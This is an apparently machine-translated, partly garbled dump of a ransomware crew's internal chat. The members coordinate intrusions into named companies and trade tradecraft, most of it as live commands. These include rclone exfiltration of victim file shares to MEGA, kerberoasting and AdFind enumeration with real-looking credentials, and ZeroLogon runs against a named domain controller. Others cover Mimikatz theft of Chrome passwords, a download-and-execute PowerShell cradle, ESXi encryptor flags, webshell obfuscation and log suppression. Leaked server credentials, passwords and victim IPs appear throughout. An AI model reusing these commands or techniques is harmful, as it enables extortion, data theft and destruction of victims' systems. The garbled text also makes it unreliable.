DO NOT TAKE IT `````` GUYS ON THE LOKO, KNOCK IT OFF THIS NETWORK + tvin here ?let me see @steven how much did you download ?@steven give me the build here for 24 hours alreadywww.ausol.com.ar_TEAM_Сага when you download I will give you the buildSo let's do it now and then we will locate the downloaded data you did not see ?@steven give me the build here plizsens`` ftp://ausol:Fig8ubff7CfuhyvGTkBfhaIfMxkDCY@23.82.140.100/uploads/ ``I just did not try from that one did not want to take off? I see that I took off the computer or something? Thank you)), all domain admins just in casewww.ausol.com.ar 444 or 556COBA://209.222.101.242:64132 P4C3aATy1mkUlTkTvOhTDwFl2SoRwFUoSMm give dsotupes in coba and pid@steven sessions pulled up, caught up in the language barrier, here spanish, balls do not take off, suggestion. no problem, now rename the channeldomain ausol.corphttps://www.zoominfo.com/c/autopistas-del-sol-sa/372403861 if anything jumped ?he had a little bit of a problem with the server...
# Fellas on the net www.ausol.com.ar_TEAM_C don't touch it in hell fill me up for the date ransom ``and fuck, maybe the cookie is just dead,`` it's not like it's in the hash, sonic, when you authenticate by hash, what do you put in the url instead of ``welcome``? i don't want to run dirbasterom does not helprname my vg to domain? he means write the domain on the machine from which you are connecting and how do i put it in the domain if it does not connect to vpn? i put the virtual in the domain as they have, there check for domain remember please how to work around EPC check sonic?he problem is that he netifikat generates ssl 3 and everything will go in the settings of the Internet explorer ssl should psotavit if we solve the problem - tell you how to solve it does not help) yes, I have this often, strangely enough for me to press edit connection helps, Remember the login to ipn account, then click ok and enter the password - will connect + is also often the same error Credential or SSLVPN configuration is wrong, the error code -7200 from the nix client openfortivpn all ok, but with the Windows I can not come in, what could be the problem?i got a -7200 error on fortivpn with valid credentials? it's probably just a dead cookie. i don't know if it's a hash error or not, but i can't log in with a hash error. i don't want to run dirbasterom does not helprname wg to domain? he means write the domain on the machine you are connecting from and how do i put it in the domain if i can't connect to wpn? i put the virtual in the domain like they have, there is a check for the domain, please remember how to work around the EPC check on sonic?i saw only webcloud and by default disconnect via 2fa code in lokalek not deplauded in lokalek or only by web in claud sendinel one? @all who worked with sentinel one console? 
i dont use mega client) and event triggers are the same (if configured), the main thing is that i dont detect signature on it is the same as with the desktop mega client i think on that why? in larder cortices this thing will be stolen, right? can be immediately improved) it was originally installed through the rdp, from the user. and to work through the coba, from systems, the rclone must point to config C:\Users\user\.config\rclone\rclone.conf and i still can not find the path. i tried to mount a disk, but it did not work. that's how it is with me) only if the session from the admin open through the rdp, then it will only be happyxm I've tried to open a session with an admin. when using it write if something is missing in the functionality, finalize it)tried it, normal tool) thank you really now on the rdp do not need to get into the cool, thank you is generally convenient, immediately after the ball put all the fs to skaii and went to do things) normal stuff should look only I have through the koba did not get something to copya))))) heh heh okay it means colleagues work with it, ok) we are also in business then)articles about it just started to use it as I understand it``` Egregor RaaS Continues the Chaos with Cobalt Strike and Rclone ``Is the http protocol on any port in the process? how is it visible/not visible in the system after installing what protocol? in 50 minutes 10gb download do it for coba) https://github.com/rclone/гсІопевот more a guide on it Hi all! Those who download files and everyone will find it useful! Very cool thing, RCLONE now there is no need to unzip mega files! everything is very quiet and unnoticeable! I do not know how to describe it) download rclon from the off-site. rclon.exe put it in the folder you need, then follow the manual. clone everything you need. everything is downloaded via the clone, so the download speed is high. Here's the guide. 
It's simple https://rclone.org/mega/ next command to download rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 remote:NT - change only this. "remote" is the name of your mega. "NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself. example rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 Happy Christmas Eve to everybody! :)Happy New Year to all !!! Happy New Year to all !!!) :partying_face: :tada:Happy Holidays to all)Happy New Year !!! :champagne_glass:`` I JOIN IN WISHING A HAPPY NEW YEAR !!!! HURRAH HURRAH HURRAH !!!!!! ```:champagne:Happy New Year !!! URA - URA - UURRRRR! Happy New Year to all the guys:raised_hands:Happy New Year to all, the main thing is health! Happy Holidays to all!!! Happy Holidays to everybody! :pray:I join in congratulations! All with a holiday! I wish everyone in the next year to progress up as much as possible and respectively, the maximum profit!!! Hello to all! Happy Holidays! All the best wishes in the new year! Happy New Year to everybody!) Happy New Year to everybody!!! :) Happy New Year, gentlemen! :snowman:Happy New Year guys! All the success, health and good luck in the new year! Same to you!)) Happy New Year! :fireworks::partying_face:Happy New Year to All!!! :wink: :handshake::champagne:Friends, I want to wish everyone a Happy New Year. We did a very good job this autumn. All, both beginners and more experienced members of working groups have grown professionally, those who lacked diligence or technical background left us naturally, let's wish them only success in other endeavors. 
All those who have gone through difficulties of mastering new tasks are with us next year, and, I am sure, will continue to evolve by learning new things and expanding the horizons of perception = ) With each passing month turnover and quality of work only grows. I am sure that 2021 will be a landmark year :-) After the holidays we will have small changes and improvements, but none of them will be disputable. Well done, everybody. Thank you all! Who has this case? Check the vm list on esxi before the lock to be sure, you can do it with a command (esxi shells): vim-cmd vmsvc/getallvms`````` Parameters to start the unix version --path If this parameter is used, the locker will encrypt files at the specified path. This parameter is obligatory, without it the locker won't encrypt anything. ./encryptor --path /path --prockiller Kills all processes which interfere with opening files. ./encryptor --path /path --prockiller --log Enables logging of all actions and errors ./encryptor --path /path --log /root/log.txt --vmkiller(For esxi only) Turns off all virtual machines --vmlist(For esxi only) Sets a file with a list of virtual machines that should not be shut down. One line for each VM ./encryptor --path /path --vmkiller --vmlist /tmp/list.txt --detach Disconnects the process from the terminal. So that if an ssh session crashes, the locker will keep working And the files won't get corrupted. ESXi version SHOULD BE REQUIRED separately If it doesn't start somewhere, I need os, kernel version and glibc version /lib64/libc.so.6 ``webroot stalls dllinject from cobalt on the balloon sticks? who has tested in the last 2-4 weeks? pour them a full listingamy 30 percent give only listingamy they have only one balloon on the balls of course from different or from different? 
all from one server downloaded?i'll upload and i can't get into the admin panel, i can't get into the admin panel, i can't get into the torus, it's laggingmayakki like i asked them to choose 2 files, not leoni they asked for a folder, listing sent a note, kids, there are still pc's schmiffed. bye myself sitprivet and wish you Happy Holidays and Merry Christmas ! :))) I'm in touch, write me when there's something. Hi. Hi, I'll be giving out tasks, what are the tasks for today?all hellojeremytonylexmanternert3chnologhelloworld123 kerberoast attack via vpn - hash removal with a kred` ``Rubeus.exe kerberoast /creduser:domain.int\sdestin /credpassword:Akeelah$14 /domain:domain.int /dc:10.254.0.20 /outfile:c:\programdata\IntelGX.log /format:hashcat ``--------- work of the adfynd through the vpn in -h ipac dc pdc then domain + account valid from AD ``adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=person)" > ad_users.txt adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "objectcategory=computer" > ad_computers.txt adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=organizationalUnit)" > ad_ous.txt adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -sc trustdmp > trustdmp.txt adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -subnets -f (objectCategory=subnet) > subnets.txt adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=group)" > ad_group.txt adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -gcb -sc trustdmp > trustdmp.txtda all normal already figured outprivet from what?Hello Sorry, overslept a little, bring me up to speed all pivetday at 77? tomorrow at the lockWhat time is the assembly of the MSC? 
if it will lock you then what will you do?You'll have to transfer it to the other one via the dedicator first, then to the other mega at 8-9 tonight... or were they on the mega you fucked up? there's a lot of data there or not if we finish the milk tomorrow we can let it go under the knife tomorrow to pump milk or start pumping conextoga\which network is better to take tomorrow:wave:hello hellohelo maza faka:zany_face:hellohadn't been there for 2 days, now in normal modewill report back to you soon I will wait for the distribution tomorrow morning mimilk finish and nothing on the locker is not ready hostrubrandon already pumpingdeads ready?i'm here i was out of light who's online? and by 9 no one what's the point of gathering everyone at 8 am + i'm in place, waiting for the deadlocks will be ready for tomorrow morning ask me please, deadlocks ready for delivery? steve hello! wait i just came over there are two networks, i'll take a look Steve, you have something interesting? i saw twin's coba, the network i gave you in pt is still dead. i think it will be ready by tomorrow halfway through tomorrow maybe even today is there a session from netfinish? all three of them will be done by the end of the week for sure. there's 240 cars on the AD but at the same time 60+ servakovmne tooada, now there will be a couple of vpnchik) have a job? sit without delahm, skin in a leech plzrode not with the old connectsHi all, the password from the coba tween changed? m? I looked there in general even something of mine there was )masonzvhhitechTyrVanoa all foundPlease share registration key to proxyfaerpeace question who online? 
help for trustsanyone give sharpshooter a master key to collect passwords if so tell me how to check a quick one-tool just no dirt, or just open a coboy somewhere with an active session@all give me please socks5 any usa working))) need it urgently and do not have access at hand, just tunnels[ ](https://stylebrooks.com/group/general?msg=ui2m2k6N3xkyWqfAX) and look at `` net view \\host /all `oko? I'll see `net view is a handy thing, I mean, who is exploring spheres/servers, via shell dir, file browser or rdp? maybe even more convenient ways there? net view please@all brothers, write in ls besides charfinder who uses what method to find goodies?thank you exactly://www.ostpstviewer.com/парни hello all. stole mail ost. can not find how to read. was some kind of site. who knows ? I'll look)+@alter do not know about the others, I do not have the right to change the passwordWe strongly recommend that you check your machines for possible bookmarks, change passwords to this and other rockets too, until the weekend do a little internal securiti audit as time will be@all Considering that many ask this question in light of recent news about the Ministry of Health of Ireland. I want to say that no one here has anything to do with this attack, we are NOT attacking gov resources, hospitals, airports or anything like that, and we won't.I'm heretout@all who's online? 
need to take a bot from vnts crapshot thankshttp://github.com/ferreirasc/scripts/blobs/27bb7f7f423efa6e9820ff4a9e2624b719978acbc2/SharpPrintNightmareexesharpPrintNighmare have you got it knocked down?)) change the coboo they start it to "interfere" you or what I z) your sample got to AV so it should already be in the blbl should scan the botyn what do I delete?))) me gasket) I can only remove the sheetscannered it looks like ``08/26 18:15:25 *** initial beacon from Lily.Winterfeldt@10.125.205.231 (SRVMDKHQN600KUH) 08/26 18:15:25 *** initial beacon from MFornell@172.24.36.6 (Dev-j64HtrrR0v) 08/26 18:15:25 *** initial beacon from PHeimer@172.22.26.173 (SRVYs7hW) 08/26 18:15:25 *** initial beacon from GodertC@192.168.221.120 (lWrzijLoyG) ``hanypots probably to be exact900 bots just show me a couple of lines show me the logs continue:D about a hundred bots came to the coba what newsletter? did someone do a newsletter now? so? without a hook trying to run a hike tried the coba 4.tried koba 4.2 without the hook? tried koba 4.2 without the hook and got the same thing, wrong authorization file, I don't know what the heck is up today should turn on hello, I'm not busy yet, waiting for when steve in the group is free may need someone to help with the case? thank` `` Vampir DHJ7i!%td6sg1%&^FDRa https://simonty.com/ ``Hi, me too register on the forum plz? Long buksuyu with the case`` `` lssyxxenLocq7m2IhQJIDmkmiW2b8eh5o4VSkXcgf4Ge03KIybJV8rFLBUYzrXMj ``` I'll try again, no reshooting, just no new sessions.i have a key logger that works? i'll look at it, i'll look at it. i need their data on the deck. let's give them a full listing. they only have a listing for 30%. they only have one listing. of course, all from one server. hey, can someone share his account on xaker.ru? happy New Year !!!!!! Be happy:raised_hands:Soedeneyatsya to congratulations! Team! :wink:Thank you ! Likewise! Happy New Year to all the guys !!! I see what you're thinking. 
thanks a lot shortly as on the router you enter the same way on the web and on Fortik for example 192.168.0.1 as a rule there) see the gateway is a hardware solution everything got it thanks, got it) how to find fortik admin? it is on one of the servers should be? for example per thread max 500kb, i download 10 threads at once i.e. the same file is downloading at 5000kb/snooo no fortik have admin area, you need to go there and turn off firewall rules, i also have no case with fortik everywhere restrictions and traffic jams, is it necessary to get it through saba? have access to fortik admin area? yesfortik only downloads archives, but it's really slow what can block downloading on server? on the host no avera, rklon and mega download gets up at the very beginning.by ipi seems to needa if just by hostname? ``beacon> shell ping ETLHODOPR01.etlife.com [*] Tasked beacon to run: ping ETLHODOPR01.etlife.com [+] host called home, sent: 58 bytes [+] received output: Exchanging packets with ETLHODOPR01.etlife.com [10.160.1.68] with 32 data bytes: Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125 Response from 10.160.1.68: number of bytes=32 time=188ms TTL=125 Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125 Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125 Ping statistics for 10.160.1.68: Packets: sent = 4, received = 4, lost = 0 (0% loss) Approximate time of reception-transmission in ms: Minimum = 187msec, Maximum = 188msec, Average = 187msec beacon> execute-assembly C:\soft\SharpZeroLogon.exe ETLHODOPR01.etlife.com -reset [*] Tasked beacon to run .NET program: SharpZeroLogon.exe ETLHODOPR01.etlife.com -reset [+] host called home, sent: 114277 bytes [+] received output: Performing authentication attempts... [+] received output: Unable to complete server challenge. Possible invalid name or network issues? 
``Yes, it's pinging DC ?``execute-assembly C:\soft\SharpZeroLogon.exe ETLHODODR01.etlife.com -reset ``````execute-assembly C:\soft\SharpZeroLogon.exe ETLHODODR01.etlife.com ``Show how you start, but the target name is exactly right``Unable to complete server challenge. Possible invalid name or network issues? Kot'nt know why zerologon writes not the first time in different networks such fuckin' bullshit, of courseyou have the same versions of coba and timeserver? if constantly a bug, then deal with it is not systematicTill you find it easier to take a new dazh, many dependencies, from the coba, to hosterne met this shit?but it sometimes works, mbe it's still possible to ozhvit)) and not kobanu dedik, it's a fact)so mbe dedikon fuckin, not koba?) sure, you can change the dedikon, but I want to fix it)if it is easy and no problems in other machines not in koba then it's the network not terrible comments and creeds fly but I easily and without problems open beacon other machines do reset long enough koba is not cluttered by itself? does it take a long time to load when you connect to a coba? does a bare ppl like ekse behave the same? and in all networks this shit? maybe someone has faced and beat this shitopen beacon on the deck, and there is nothing, enter commands - no reactionA more? what do you mean beacon stops working? 
hello everyone, can anyone tell me how you can beat the shitty response from the dedicator to the tem server, beacon stops working oftenRklon is also convenient to take a listing of files from the fs, to study before downloading, quickly makes ``` rclone lsl "D:" >> C:\listing.txt ``[ ](https://stylebrooks.com/group/general?msg=bEwLBjZpFRkjLMvbT) this command won't show the folders in a megabyte, for example, or on cftp[ ](https://stylebrooks.com/group/general?msg=73N4hKedEtTrFYPZz) how is it different from shell dir /s /b /o:n /ad ?appreciate, thanks maybe somebody will be interested - rclone can list the folders on the server ``rclone ls remote:path # lists a re ``or just zip it up is it realistic to write a cna that would put an option in the coba in the file manager to zip a folder and immediately download it? that was fucked with tm I remember, I wondered how he troilis through it ok ? webroot ? simantec ? TM ?cisco edr, falcon, eset, sofosi in our experience that meet our cobalt injector which is not that fuckin@all give me a list of avers where our shellcode injector does not start conti normally[ ](https://stylebrooks.com/group/general?msg=n2Wre72jLwCfktF2J) change the config wusa.exe > rundll32.exe change the config will be enough gmer or an analogue that kills processes, but it's in emergencies, and sometimes it swears at them guys, who killed the webroot on the pass? I don't think it's the antivirus. It's not allowing you to crash the binary to the specified path. You have to change the path and name of the executable in the profile. [-] Could not connect to pipe: 2 No, I want to test one tool on a carbon, but I haven't tried it. Would you like to set it up? 
if you meet them, you'll understand what i mean)@t3chnolog what kind of antiviruses are they?)))@all a minute of attention who have in work cases with evil antiviruses like cilance/crowdstrike/firewire/carbon and have admin rights on at least one host - write to pmoffline_winpwn.ps1 for machines without internet access - use commands from manual after importing ``Import-Module .\WinPwn.ps1 ``` or ``iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1') ``That's the same way you looked at it in the transfer list``. lssyxxenLocq7m2IhQJIDmkmiW2b8eh5o4VSkXcgf4Ge03KIybJV8rFLBYzrXMj ``` find out who's id? mmm? kk```https://www.zoominfo.com/c/arrow-material-services/355399602 7 Servers 0 Works ftp://EPFSOpItzNwIpTzaB6d:gYjW79f9VZ20l2fjItXBaMOtNyJQMD@23.82.140.100 Arrow Material Services is a leading provider of logistics, handling, terminal operations.... Revenue: $51 Million Locker: Conti Works: Fury,Steven,Sonar Kk write the report, Fury started to localize there? PART ``Ping request could not find host arrow-nb204.AMS.local. Please check the name and try again. Ping request could not find host arrow-dt219.AMS.local. Please check the name and try again. Ping request could not find host arrow-dt218.AMS.local. Please check the name and try again. Ping request could not find host arrow-nb224.AMS.local. Please check the name and try again. Ping request could not find host ARROW-NB216.AMS.local. Please check the name and try again. Pinging arrow-nb231.AMS.local [10.2.7.5] with 32 bytes of data: Reply from 10.2.4.61: Destination host unreachable. 
``And it's like all the winks are off-line'' PING SERV 10.2.4.62 10.2.4.64 10.2.4.63 10.2.4.79 10.0.168.3 10.0.168.1 10.0.168.2 ``Okay today at 7 am loc@alter here we need to build@fury balloons again and we can close them good goody goody goody, wait for steven and put them on download, we'll close them tomorrow`` ``information for download \AMS-HYPERV01.AMS.local\D$\Hyper-V\Virtual Hard Disks \AMS-FS01.AMS.local\d$\Backup\jengel\Documents \AMS-FS01.AMS.local\d$\Company Shared Files \\AMS-FS01.AMS.local\d$\Documents \ams-sndb01.AMS.local\e$\MSSQL2017Backup ``Knszczas 20-30 minutes and I'll give the serverszczas try to pour on ftpparni on the mega so far not lieutenants, go look at the balls , and put on the pump , here's the mega. It's paid for, the Confurm is still going on. ``laposberrrg@outlook.com KJDBu2bd&*@*&@(*YU@IOnxlknx ``Kk after tomorrow we'll put them up for uploadsGreat8serv 28 workthere are so many servers. I'll go to the balls to see what to download while the GAS is scanning.``AMS\amsadmin @rr0wM@t3r1@ls I'll try the balls with tool chain1092 I'll take the balls off and pull them apart I'll pull the comp up what are you guys doing there?i have pulled my grandfather, now we are going to take off the hellsonar, please release it all rebooted all rebooted me batinkok i have not rebooted yet i need to take off the ad green marking i have pulled the grandfather) majikkk, now i will do it myself. i got kicked out of the rip from my own rodeo, but there is a ripconnected and i can not connect to your rodeo, pull the bot via speedtestock command, but apparently copied it wrong - does not go ``COBA://172.96.143.178:40610 sDBkQSRs9oW7Q7Q8rgydk40J9kVbdThQXeJ1P ``I tapped into this coba COBA://192.254.79.154:35752 GpleevXlouzccVl9FJ8U9Tdivc1sfjyGqt wait for which coba to enter in the end? all sorted out jdk reinstalled and everything worked )kkda sec I have something coba now I will figure it out.... 
GpleevXlouzccVl9FJ8U9Tdivc1sfjyGqtn
nishtyak, now I will find out which kba work?
I have the first 2 minutes on the cracks already working
ahead, but I immediately got kicked out, so someone is working on them. Will have to try early in the morning
ok
later will try to raise so, look, there are cracks in the WHOH
Hi) all welcome
@Fury take the guys and jump
ahead ... )
all the same sessions to reshoot
kobyda no matter what I do not about it)
I have 4.2 kobaya did not download)
hey hey, have anything to do? or all already downloaded?
datsnet domain
remind me please, in the meter to check the local account instead of the domain . put?
Do I understand correctly that these parameters disable the log? And why not WireGuard? It is faster and more vanilla
this is a good manual, and if you sign servers on the VPN server - think what happens when you compromise the VPN server) when you compromise the certification server, you can listen to the traffic
Thanks, I did not know, very interesting)
center - server = one and the same. but i did not know that you can isolate it. it's funny
here in detail http://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-18-04
гцне server and the center, certificates you can sign at your
do not forget in the configuration of the server.conf add
```
verb 0
log /dev/null
status /dev/null
log-append /dev/null
```
you either have the wrong expression, or I do not know how it will be the certification server on the local machine?
maybe just do not store the keys on the server, do not install certification centers on the server itself, do it on the local machine....
https://github.com/Nyr/openvpn-install I'll dig up a vpn script
if you use public vpn then only on the output, before it you should be all right
set your vpn servers on different hostings
on what to transfer?
interpol - cyberbez))))
of course competitors
there was a vpn service, what was it, doublevpn ? competitors ?
and what about doublevpn ?
can be crypto dll coba and through the session pull out with mimicatak from admin and yes
local admin rights are there ?
hysterics((
need to know if the av screams when dumping through the task manager
Hello all ! :handshake: Guys, how can lsass be dumped with AV Microsecurity on board?:face_with_monocle:
+
When AV shouts no, he means yes))
very much swearing, but let it pass
ehhe
so also with makaffy it was, earth to his soul))))
shortly everything you need to know about modern antiviruses
could not beat the trend micro, let ekse, he gives a fuck
Please can someone bicon crypt?
remind me how you can steal chrome cookies in JSON format from a cobalt session.
Remind me before there was CIP telephony with forums - I forgot their name / contact
@all Friends, you write to me periodically with different technical problems of different complexity, to write a script, to correct a splot, to test something in closed mode, to correct a ready-made script on the git, and so on. I want to remind you that we have a full-fledged development department for such tasks, where responsible persons will be assigned, but only if you yourself will provide full-fledged testing of the ordered product and share it with your colleagues. Please take this carefully and responsibly, if you have requests for such - write to me in PM what you need to write / to correct / to complete and so on
@all sicaf-cosmetiques.fr again lost the owner and the confab is not!!! URGENT! need info
1. scan for vulnerabilities or watch the update poke to understand the fix is rolled or not. 2. Paleoad is needed, create a job and lift through it (i can be wrong let them correct) 3. Saw the manual cool from Ragnarek there was this
1 How well it works on the patched 2008? 2 Is it necessary to start a session in msf or is it necessary to tunnel through proxy in Cobalt? 3 Maybe there is a simple manual? Please share your experiences who worked with Exploit EternalBlue in MSF ...?
Whose?
I understand, thanks
greatest thing is that 90% of the time 1 naprol to everything)
also in the software can be IT folder with passwords, but also they can be passwords in excels found on the desktop and in the docks, called passwords) Once these same excels found in van drive authorized in the mail body
Hi all. Tell me please, where can I find the Credits from Datto? Viam, orbs, cypress, chrome is understandable. Any other options, where they are most often stored? Maybe some way out of the clients can?
cps, added to the notes
`execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\programdata\`
guys can I add to the confab about tool chain? you shoot sharphound, you drop it into bloodhound - profit
in two words who can explain how bloodhound start using?
resolved through the replacement wusa.exe to rundll32.exe
do you need to connect as local admin? or enable local admin service?
jhmW6WXkvsAwheK2P5XiR8Cm7k6dYgnFAcD8y6ONiZBZbEQIUFk1gVjdnpSwqHDq
look whose
Hello, everyone. If anyone has debugged CVE-2021-21985 for vCenter, post a PM, please.
@Chuck there is a .txt variant, it went better for me
Hello, does anyone have a video on MS17?
hello, tell me hosting for Іncxp
guys proxy adfind as app and go to proxyfind add
```
adfind.exe -h 10.80.9.5 -u domain\user -up p@$w0rd -f "objectcategory=person" > ad_person.txt
```
As an option, specify the IP address of the domain controller and try to build ad_person via sockets.
```
beacon> execute-assembly /home/user/soft/ActiveDirectory/adfind/AdFind.exe
[-] execute-assembly error: max upload size is 1MB
```
Of course lol, AV already bans legitimate tools because their hack groups use them lol (I mean the adfind itself)
I haven't tried it, but I wonder if it'll work
they use winapi there, i think it's written in sycharp, try to do it via execute-assembly
or an alternative way to remove the adfind where there's an ab that breaks the adfind, like sofos?
Greetings all, question to the knowledgeable, when backing up a skul base
`sqlcmd -E -S localhost -Q "BACKUP DATABASE databename TO DISK='d:\adw.bak'"`
If the base is a pass, then in the backup will also be a pass, can you remove it (pass) during the dump or what else to get the output backup has no pass?
Got it, thanks
But still, if the question is about speed, the method can be easier to take. How else can I do it if there is a large attachment and the number of files?
I divide into portions of the archive that would be easier to download by 8gb
7zip
then tell me, do you archive files before uploading or take away as is? if so, what is the speed?
IP Address: 23[.]82[.]128[.]116 Domain Name: secost[.]com Whose? I need to check one
@all who has a session on the cob from a user's machine with system rights and an authorized user - please write to pm and give me access to this coba
Performance of this should not depend on which av. if evil, they may swear, won't they?
`mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect`
button in the context menu, runs on all selected, the output is crooked, but it's the wind, no time to mock further, the script itself removes after itself
mason
Does anyone know how to check whether tapes are connected in veritas backup exec? I can't use library, says it does not support it
on the forum please obfuscator
For those who have asp webshell is deleted by aver! you can obfuscate not only the one in the archive, it removes the detects
link:
```
https://github.com/grCod/poly
```
- command example:
```
poly.py -c aspx -e rnd -p shells/shell.aspx [-j]
```
parameters:
```
'-c', = 'Shell code. [ php, asp, aspx ]'
'-e', = 'Encoding method. [ b64, ord, rnd, rot ]'
'-p', = 'Path to shell.'
'-j', = 'Add junk code.', action = 'store_true'
```
Yes, 100k hashes, I use ntds hashes for brute-force
cdbx\archives/extracell - best
What's a top subscription?
Brute-force ntlm and kerberos
first thing I check on cmd5.org
I give to the section paid hash hacking on eksp, but you can go directly to the two guys who most decrypted me, it is:
```
https://forum.exploit.in/profile/85027-amiga/
https://forum.exploit.in/profile/46932-sc0rpi0/
```
They should be able to help
in any case, thanks, I will keep in mind
ah well, 100k hashes. how's everybody for a top subscription ?
I also have an account, there seems to be a lot of wood, should be enough for a long time
dunkshesk also monthly subscription, who wants - please
@brandon cmd5.org has an account, who need it - welcome, top subscribe
Demand if we collect the top 10-20 links, then create a branch here and collect a total stat - the leaders will be revealed fairly quickly and everyone will have access to it
for quality decrypt - to be honest, I'm not thrilled, but, I used it a little, the feeling that cmd5 works better, but there is a bulk fit and it is free, but there is pesky captcha
http://crackstation.net/
do more services
It's a common fucking problem, let's solve it :)
in cmd5 you can get a bunch of hashes through a page with 200 hashes and a lot of hashes through windows binary.
ntlm hashes can't be done with topchicopt, but it's like there's only one hash at a time
cmd5.org seems to work fine
@all who decrypts hashes? There are a couple of people, but maybe synchronize all the contacts, services, farms to make it all run more efficiently? The idea is to give a dozen hashes to online services and see the output, where brute force - then the service really steals, similar to the bruter from the different forums. We could compile 10 services, then make up the top 3 and work with them constantly
I made a mistake with the chat. Sorry.
```
10.200.0.4 10.200.0.5 10.200.0.8 10.200.0.9 192.168.170.250 192.168.170.251 192.168.170.252 192.168.170.253 192.168.136.56 192.168.136.137 192.168.139.153 192.168.254.52 192.168.255.52 192.168.254.76 192.168.255.76 192.168.254.53 192.168.255.53 192.168.254.74 192.168.255.74 192.168.254.54 192.168.255.54 192.168.254.55 192.168.255.55 192.168.254.72 192.168.254.71 192.168.255.71 192.168.254.68 192.168.255.68 10.20.6.63 192.168.136.6 192.168.136.5 10.20.6.26 192.168.136.29 192.168.136.151 192.168.170.249 10.20.6.42 192.168.136.100 10.20.6.201
```
@all in which confab the locker is missing tell me i lost some one where the software should be put
who dealt with it that would not fade RDP when inactive what settings should be done?
that too bad, the pass in the clear will lie near)
googled on the subject, like they say you can create in a folder with rclone .ini file and set `SET RCLONE_CONFIG_PASS = xxxxxxxxxxxxxxxxxx` without entering it into the console
The question is how to pass the parameter with the password at startup, from the cobbs, say
the conf file is better to put somewhere in one place and all exe specify in the command where to take it from, like this `copy --config C:\programdata\Oracle\Java\.oracle_jre_usage\rc.conf "\\192.168.1.13\H$\Backup\Data\000\000\0\0\17" options:.....` since it's not easy to collect conf files later, and there you can tell the information in the palm of your hand...
and then the megs will crash often
that would be more fun with the encryption would be to rewrite it) reliably:joy:
I will give you by64 encryption if memory does not change
config you create and forward
xxz, the default password is encrypted, about the soap, you still the file rclone.conf file and put it next to the ecz, then delete it as you downloaded everything, about the background, I do not know, I use rdp to start and kmd is spinning - I do NOT logoff - just turn off, if you want to logoff - need to run from the system as a service, and the system is not available from the ball, but if you have them primaunched, but this is also an extra finger
done, you can encrypt the account and password, but it is entered only with gui, and without gui, such as coba to do it?
how can you run it from the system, and logoff the user that it would applaud in the background
who uses rclone for upload?
yes, that way and solved the problem ....)
if you look through AIP there in the hostnames you can look for DC
usually the first dns is always dk
ipconfig /all
dk is usually a dns server
yep
do you have both netextender and smac client installed? both?
i don't know dk aiP, so i asked for sabinetikh)
i hardly shut it down recently, no disconnect, button is not active, reboot does not help
I had a hard time disconnecting it, it wouldn't work when I restarted my computer, I had no rights to fuck it up, I stalled my processes and the service brought them back up. I had to uninstall it and it would connect to the network by itself) it's a glitch, sonic
maybe somebody met that, when I connect to a client with a sonic vpn, EPC agent pumps and then opswat override. As finished any creed knocks out EPC Check fail.See log for more details
`addfind -h 10.200.58.11 -u jacquetmetal-sb\tomasetr -up willi2712 -f "(objectcategory=person)" > ad_person.txt`
like this from the usercrede can collect without problems
16 subnet simply will scan forever
why bad collects?
they are either set by the admin or not, no?
no no, you need exactly the gathering of subnets WITHOUT the adfind, when only the ipn is and the user's credentials, more nihua
adfind kalovo collects, I like to do so, we parse all the hostnames from ad_computer's then ping them with pinginfview, arrange the output by ipi addresses, then just parse all the subnets from there /24
@all please share the script for gathering subnets without adfind =)
thank you
```
psinject 000 x64 Invoke-ShareFinderThreaded (-CheckAdmin Admin Balls) -NoPing (-MaxThreads 4 number of threads)
```
argument, I'll send you
@Code can you modify the script so that the number of threads is given as an argument? so look at the thread count depending on the patient
The optimal number of threads for bulk queries in general is 10-15 - lowsec 8 - midsec 4 - highsec
you can adjust number of threads, 10 is good by default
wow, that's pretty cool about multithreading
try to put it on dinchek without arguments, but i don't know what it will show you, dinchek can only run the build with regsvr, you should run it with radll
get a monthly subscription, there in the scan options you can specify an entry point for the dll, after you upload it there
I mean the locker.
Good morning! I think in cobalt_v42_patched wrote that with the function DllInstall
Good morning, everyone! Can you please tell me how to properly check the DLL of the build on the dincheck? Is it necessary to specify some kind of input function?
obfuscator of webshells, I have not tried it, but guys from ekspa say it helped to avoid detects, if it works let me know
```
https://github.com/grCod/poly
```
Guys, when connecting via an ndp via ngrock backdoor, displays an error (after the request creeds)
may be useful to someone - looked script ShareFinder recently, there is a multi-threaded scan with the output in the console only the ball, where you can get and get all the computers in the network, which incidentally works better than net view, which sometimes dumps + search all mssql bases in the network (not in the balls)
```
powershell-import ../ShareFinder.ps1
psinject 000 x64 Invoke-ShareFinderThreaded -CheckAdmin -NoPing
psinject 000 x64 Get-NetComputers (-SPN mssql* find all mssql databases on the network)
```
192.168.17.0/24 tell me and try to get into the neighboring ones.
It's not like it opened normally in myexec
just pseudo-admin rights, you can't do it without rights
the same thing with wmiexec I tried it too
